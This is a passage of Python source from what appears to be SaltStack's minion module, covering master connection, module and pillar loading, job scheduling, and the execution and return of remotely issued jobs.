break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if self.opts['transport'] == 'zeromq' and HAS_ZMQ:
io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
if self.opts.get('master_type') != 'disable':
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(opts['conf_file'], ignore_config_errors=ignore_config_errors)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = Minion(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=['__master_alive'])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
'__master_alive_{0}'.format(self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
'__master_failback':
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job('__master_failback', persist=True)
else:
self.schedule.delete_job('__master_alive_{0}'.format(self.opts['master']), persist=True)
self.schedule.delete_job('__master_failback', persist=True)
self.grains_cache = self.opts['grains']
self.ready = True
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1})'
'both must be a positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
# Don't duplicate jobs
log.trace('Started JIDs: {0}'.format(self.jid_queue))
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.push(self.functions.context_dict.clone())
exitstack.push(self.returners.context_dict.clone())
exitstack.push(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
